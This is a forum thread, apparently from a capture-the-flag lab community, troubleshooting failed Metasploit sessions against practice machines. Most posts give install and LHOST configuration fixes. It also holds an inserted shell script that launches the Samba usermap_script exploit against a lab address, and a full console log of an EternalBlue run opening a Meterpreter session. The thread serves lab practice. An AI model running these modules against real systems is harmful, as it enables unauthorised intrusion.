[SOLVED] Exploit completed, but no sessions created.

Not sure if this was a spoiler, so I've retracted the comment.

I know this is already solved, but I was stuck on this for some time and I think some more detailed steps could help someone.

I was able to fix the same problem by downgrading to msf5, so if you're on msf6, try following what I did. The thing is that msf5 is more stable than msf6, and that's why I recommend downgrading. I can give some steps:

Uninstall Metasploit 6. I did: sudo apt-get --auto-remove metasploit-framework (just type meta and press the Tab key to autocomplete)

I downloaded msf5.tar.gz, which can be found here: Release 5.0.101 · rapid7/metasploit-framework · GitHub
and extracted it with the tar command: tar xvzf filename.tar.gz

Go to the home directory with cd ~
Then do: gem install bundle
The command above is required to install the different gems (dependencies) that Metasploit needs.

Then go back into the extracted folder and use this command to get all the gems for Metasploit: bundle install
Keep in mind you might have to do bundle install a few times later on, so make sure you go into the extracted Metasploit folder before you do bundle install.

These gems are the dependencies that OP was talking about and how he fixed his issue. Now here's the kicker: when you try to do bundle install, it will give some error. Try reading through that error line by line; it will give a command saying to make sure something is installed before bundling.
Use the command it shows in quotation marks, and then it will give you another error which will say something like "check the log file" and give the path to that file.

'cat' the log file that the error names and you'll see the error there. It will say something like "this directory/file does not exist". Now just google that error and some Stack Overflow-like websites should show up with the answer. The basic issue here is that the dependencies you are installing for Metasploit have their own dependencies, and it's a simple matter of using apt to install them (sudo apt-get install packagename). I had to install these dependencies and then do bundle install in the extracted folder. Then it would give another error, and it carried on for a few more times. After a while, when you do bundle install, it should say something like "bundle complete" and not give any more errors.

You're technically done (to run Metasploit, just go into the extracted folder and do ./msfconsole), but here's what you could do to make it a little easier to start Metasploit.
I used an alias so you can access Metasploit from anywhere instead of having to type in the directory each time you want to use it.

To create an alias, I kept the command similar to the original, which is msfconsole.

Just keep in mind that if you keep msf6 installed or install it later, this alias might interfere, so either don't use msfconsole as the alias name or replace the msfconsole before the = with something else like msfconsole5 or msf5console.

I used: alias msfconsole='cd "path to metasploit extracted folder"/ && ./msfconsole -q'
The -q runs Metasploit faster.

I was stuck on this for a while and I hope this helps someone.

@Phantom95 said: (quoting the post above)

Nice. I thought about doing this and may still downgrade. I found another way around my problem using a different problem, but I'm still a bit worried about the transition between python2/msf5 and python3/msf6 as someone new trying to follow tutorials.

@fazersheen said:

Nice. I thought about doing this and may still downgrade. I found another way around my problem using a different problem, but I'm still a bit worried about the transition between python2/msf5 and python3/msf6 as someone new trying to follow tutorials.

I'm kinda new too, and it took me a while too, but I'm happy I did it, and I guess you only learn by doing it.

I'm a noob, using Metasploit 5, and I still get the error on Legacy. Any ideas?

Started reverse TCP handler on 192.168.0.40:4444
10.10.10.4:445 - Attempting to trigger the vulnerability…
Exploit completed, but no session was created.

@juanhk said:

show options

LHOST 192.xxx.x.xxx yes The local listener hostname

set LHOST (the OpenVPN IP, tun0)

The problem is that it automatically loads the eth0 IP, when it should load the tun0 one.

This worked for me. Thanks.

Has anyone managed to get a resolution on this issue?
I have tried all the solutions on this forum, including reinstalling Metasploit, rolling Metasploit back to v5, disabling firewalls, trying each payload, and running msfconsole as sudo.

All config under 'show options' is set correctly: RHOSTS as the Lame box and LHOST as the IP of my tun0 adapter.

If anybody could offer any advice or resolution I would be very grateful as I am very stuck and not sure what to try next!

This was driving me crazy for the past 2 hours. This is an easy box so my fragile ego is in shambles (boo hoo). Is there something wrong with this box or am I just doing it wrong?

I have tried the Metasploit solution, and I have tried a script I found on the internet. I have tried using the Pwnbox OS that HTB offers as well to do the Metasploit solution. Metasploit on both gives me the same "no session created" issue, and the script either isn't working or can't make it back. Can anyone make me sane again? At this point I feel like someone patched it on me to pull a sick prank.

This is the name of the script. I assume this isn't a spoiler since there's a writeup, but it has the same name as the Metasploit exploit. You can find it on GitLab if you google search it.

! usermap_script.py by amriunix

When running nmap -p 445 -A 10.10.10.3 I'm getting that the SMB version is 3.0.28a instead of the 3.0.20 which is the one in the walkthroughs. Does this make any difference for the exploit?

@T0fu said:

When running nmap -p 445 -A 10.10.10.3 I'm getting that the SMB version is 3.0.28a instead of the 3.0.20 which is the one in the walkthroughs. Does this make any difference for the exploit?

I noticed the same thing. The documented exploit only works for versions 3.0.20 < 3.0.25rc3, and the current version is 3.0.28a.

I'm still digging but haven't found a fix yet. I might try the fix fluffikinz recommends, but it would be nice to know if there was some kind of change in the box/challenge. It seems inconsistent to make such a drastic change after the box is retired and so many have already owned it, to require a completely different tactic.

In case someone else encounters a problem here: basically, I'd say that Metasploit, if LHOST is not specified, will use the default network card's IP. The thing is, because we're connected to the lab through a VPN, this makes Metasploit listen on the "wrong" interface in this context.

To fix this, you'll have to change LHOST to the IP address you have on the HTB network (tun0):

set LHOST 10.10.1X.X

Hope it helps

Yes, Samba might be upgraded, but there are still other vulnerable services exposed.

Also, I found it quite handy to set LHOST to tun0 rather than to a specific IP, as the IP changes between connections.

There are 2 things you need to do:

  • Update msf-framework. You will need to go into its /usr/share/metasploit-frame and run "bundle install". From there, your msf will have all updates and upgrades. There is a problem upgrading it from the command line.
  • For LHOST, please try to figure out your IP address and set LHOST to that. Try to choose the right one with Google's help. You should be fine.

~~Not sure what I did different, but I just skipped this one for about a week and came back to it. Magically msf worked this time. ~~

However, I did type in the wrong IP the first time running it, so I'm going to chalk it up to either user error or something wonky with the servers that got fixed. numbors R hard. Make sure the connection handler in msf binds, and if it doesn't, check that your options are correct.

I was going through what I did step by step and realized:

! I used the OTHER Samba port! I don't know if maybe I refused to try that port for some odd reason, but that was the issue. That seems like an issue I'd catch, but... seems that isn't the case. Look at your scan and try the other ports (if you don't know which one, just try all of them, but nmap should give enough info to know which one). Feel dumb lol

Use your tun0 inet address for LHOST instead of your LAN IP, because we are connecting through the HTB VPN.

Still same issue

At the time of writing this, I was able to establish the connection using the recommended command:

set LHOST tun0

Thanks for all continued recommendations.
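As an added example (not code posted by anyone in this thread), here is a small POSIX shell script that does what the replies above recommend: it pins LHOST to the tun0 address instead of the interface Metasploit picks by default, and it refuses to launch the module when tun0 has no address, which is the case where the payload is told to connect back to an address the target cannot reach and the exploit ends with "no session was created". It also wraps a tarball install like the msf5 one described earlier so the launcher does not change your shell's working directory. Everything named here is an assumption for illustration: the target 10.10.10.3 and the module exploit/multi/samba/usermap_script stand in for whatever you are running, /tmp/lame.rc is an arbitrary path, MSF_HOME is a hypothetical variable pointing at an extracted Metasploit folder, and the `ip -o -4 addr show` listing embedded in the script is constructed sample output.

```shell
#!/bin/sh
# Added example (not from the thread): pin LHOST to the VPN interface address
# and launch msfconsole from a resource file, so the reverse handler is never
# pointed at the LAN interface. Interface name, module, target address and the
# MSF_HOME variable are assumptions for illustration.

# Extract the IPv4 address of interface $1 from `ip -o -4 addr show` output
# read on stdin. Field layout: "<idx>: <iface> inet <addr>/<prefix> ...".
vpn_ip_from_listing() {
    awk -v want="$1" '$2 == want && $3 == "inet" { split($4, a, "/"); print a[1]; exit }'
}

# Live lookup of the same thing (needs iproute2). Prints nothing if the
# interface is absent, which is exactly the "VPN not up" failure mode.
vpn_ip() {
    ip -o -4 addr show "$1" 2>/dev/null | vpn_ip_from_listing "$1"
}

# Write a resource file: write_rc <file> <module> <rhosts> <lhost> [lport]
write_rc() {
    lport="${5:-4444}"
    cat > "$1" <<EOF
use $2
set RHOSTS $3
set LHOST $4
set LPORT $lport
run
EOF
}

# Start msfconsole quietly with the resource file. If MSF_HOME (hypothetical)
# points at an extracted tarball install, run ./msfconsole from that directory
# in a subshell so the caller's working directory is untouched; otherwise use
# whichever msfconsole is on PATH.
msf_run() {
    if [ -n "${MSF_HOME:-}" ] && [ -x "$MSF_HOME/msfconsole" ]; then
        ( cd "$MSF_HOME" && ./msfconsole -q -r "$1" )
    else
        msfconsole -q -r "$1"
    fi
}

# Constructed sample of `ip -o -4 addr show`: a LAN address on eth0 and a VPN
# address on tun0. Metasploit's default LHOST would be the eth0 one.
SAMPLE_LISTING='1: lo    inet 127.0.0.1/8 scope host lo\       valid_lft forever preferred_lft forever
2: eth0    inet 192.168.0.40/24 brd 192.168.0.255 scope global dynamic eth0\       valid_lft 86000sec preferred_lft 86000sec
3: tun0    inet 10.10.14.16/23 scope global tun0\       valid_lft forever preferred_lft forever'

# main [lhost]: detect tun0 unless an address is given, refuse to continue
# without one, then write /tmp/lame.rc and launch the module.
main() {
    lhost="${1:-$(vpn_ip tun0)}"
    if [ -z "$lhost" ]; then
        echo "tun0 has no IPv4 address; connect the VPN (or pass LHOST) first" >&2
        return 1
    fi
    write_rc /tmp/lame.rc exploit/multi/samba/usermap_script 10.10.10.3 "$lhost"
    echo "LHOST=$lhost, resource file /tmp/lame.rc" >&2
    msf_run /tmp/lame.rc
}

main "$@" || echo "nothing launched; fix LHOST and retry" >&2
```

`set LHOST tun0`, as one reply notes, makes msfconsole resolve the interface itself; the script does the same resolution up front so that a missing VPN fails loudly before anything is sent to the target. Run it as `sh lhost_rc.sh`, or `sh lhost_rc.sh 10.10.14.16` to supply the address by hand.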

@BasedJab said:

OK, so I finally found the fix.

I uninstalled Metasploit (sudo apt-get remove --auto-remove metasploit-framework) and then re-installed the new build from their GitHub repo. I installed it in my /opt folder and then installed all the dependencies (a bunch of Ruby gems that will probably need some manual dpkg installs themselves), and now it works.

I guess the default Metasploit just didn't work, and upgrading it also didn't.

This is what I ended up having to do as well. Except I re-installed using apt:

  1. sudo apt-get remove --auto-remove metasploit-framework
  2. sudo apt update && sudo apt install metasploit-framework -y

This didn't help me with the manual exploits, though, so there is still something in the 2020.4 Kali instance that's blocking stuff. For Legacy, the Windows firewall kept getting enabled somehow; it took many resets to figure it out.

set PROCESSINJECT lsass.exe: this worked and the exploit executed.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 10.10.14.x
lhost => 10.10.14.16
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PROCESSINJECT lsass.exe
PROCESSINJECT => lsass.exe
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31                    ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Started bind TCP handler against 10.10.10.40:4444
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (0.0.0.0:0 -> 10.10.10.40:4444) at 2021-01-15 20:30:59 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=